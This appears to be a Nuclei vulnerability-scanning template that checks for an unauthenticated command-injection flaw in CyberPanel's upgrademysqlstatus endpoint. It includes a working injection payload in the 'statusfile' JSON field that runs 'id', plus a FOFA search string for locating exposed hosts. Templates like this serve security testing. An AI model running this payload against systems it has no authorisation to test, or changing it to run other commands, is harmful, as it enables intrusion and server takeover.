http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Content-Type: application/json

          {"statusfile":"/dev/null; id; #"}
id: CyberPanel-upgrademysqlstatus-RCE
info:
    author: Superhero
    description: |-
        fofa: app="CyberPanel"
        该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。目前该漏洞技术细节与EXP已在互联网上公开，鉴于该漏洞影响范围较大，建议用户尽快做好自查及防护。
    name: CyberPanel upgrademysqlstatus 远程命令执行漏洞(QVD-2024-44346)
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488694&idx=1&sn=7d5357b8756064c5a0cc84d76e1e00b3&chksm=c267a185f51028933c44030cf2fdd3ba043a782064480b2dcdb38295a59e83f76e089604a7a6&token=555018471&lang=zh_CN#rd
    severity: high
    tags:
        - RCE
